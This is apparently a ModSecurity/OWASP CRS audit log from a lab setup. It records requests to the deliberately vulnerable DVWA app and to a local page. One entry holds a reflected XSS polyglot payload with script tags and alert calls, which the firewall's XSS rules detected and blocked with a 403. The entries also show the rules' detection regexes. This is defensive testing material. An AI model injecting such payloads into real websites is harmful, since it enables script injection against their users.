-
Notifications
You must be signed in to change notification settings - Fork 3
/
modsec_audit.log
209 lines (209 loc) · 773 KB
/
modsec_audit.log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkVV38AAAAA","remote_address":"192.168.75.130","remote_port":46150,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkVV38AAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":814,"p2":1881,"p3":83,"p4":541,"p5":71,"sr":35,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:31 --0400","transaction_id":"WRb@g38AAQEAAAkW4REAAAAB","remote_address":"192.168.75.130","remote_port":46152,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1419","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@g38AAQEAAAkW4REAAAAB\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":978,"p2":2285,"p3":106,"p4":660,"p5":142,"sr":78,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:39:53 --0400","transaction_id":"WRb@mX8AAQEAAAkXs94AAAAC","remote_address":"192.168.75.130","remote_port":46160,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRb@mX8AAQEAAAkXs94AAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":689,"p2":3261,"p3":0,"p4":0,"p5":131,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuD8AAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRcASX8AAQEAAAkYuD8AAAAD\"]"],"stopwatch":{"p1":784,"p2":1763,"p3":63,"p4":523,"p5":54,"sr":62,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEAAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Thu, 11 May 2017 01:54:25 GMT","If-None-Match":"\"107-54f35de4f1afb\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:47:03 GMT","ETag":"\"107-54f6738077c82\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcASX8AAQEAAAkYuEAAAAAD\"]"],"stopwatch":{"p1":614,"p2":987,"p3":52,"p4":157,"p5":49,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
